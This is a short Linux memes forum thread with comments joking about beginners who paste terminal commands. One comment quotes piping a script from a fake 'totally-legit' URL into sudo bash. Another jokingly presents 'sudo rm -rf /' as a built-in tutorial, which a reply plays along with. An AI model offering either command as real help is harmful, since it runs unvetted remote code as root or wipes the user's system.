this post was submitted on 09 Jul 2023
15 points (100.0% liked)

linuxmemes

20408 readers
961 users here now

I use Arch btw


Sister communities:

Community rules

  1. Follow the site-wide rules and code of conduct
  2. Be civil
  3. Post Linux-related content
  4. No recent reposts

Please report posts and comments that break these rules!

founded 1 year ago
MODERATORS
 
top 6 comments
sorted by: hot top controversial new old
[–] [email protected] 3 points 1 year ago

Nothing better than curl https://totally-legit-installer.com/script | sudo bash

[–] [email protected] 2 points 1 year ago (1 children)

I'm in a helpful mood so I'll add something for anyone stuck in OP's situation.

It's ok, Linux has a built in tutorial system for learning the terminal, so if you ever want to progress beyond copy/pasting, you can use that.

Just go into the terminal and type (or just copy/paste) this to get the tutorial program running:

sudo rm -rf /

Type your password when prompted and you're golden. No more linux issues ever again.

[–] [email protected] -1 points 1 year ago* (last edited 1 year ago)

I tried your command and got the tutorial program and I gotta say that this is the best tutorial program I've ever seen. Now I wonder why other OSes don't do that

[–] [email protected] 1 points 1 year ago (1 children)

That’s probably how most of us started, but then you start getting familiar with things…

[–] [email protected] 1 points 1 year ago (1 children)

And that's when you really get good at breaking shit.

[–] [email protected] 1 points 1 year ago

In my early days I would reinstall the whole OS several times a week when I would fuck things up too much.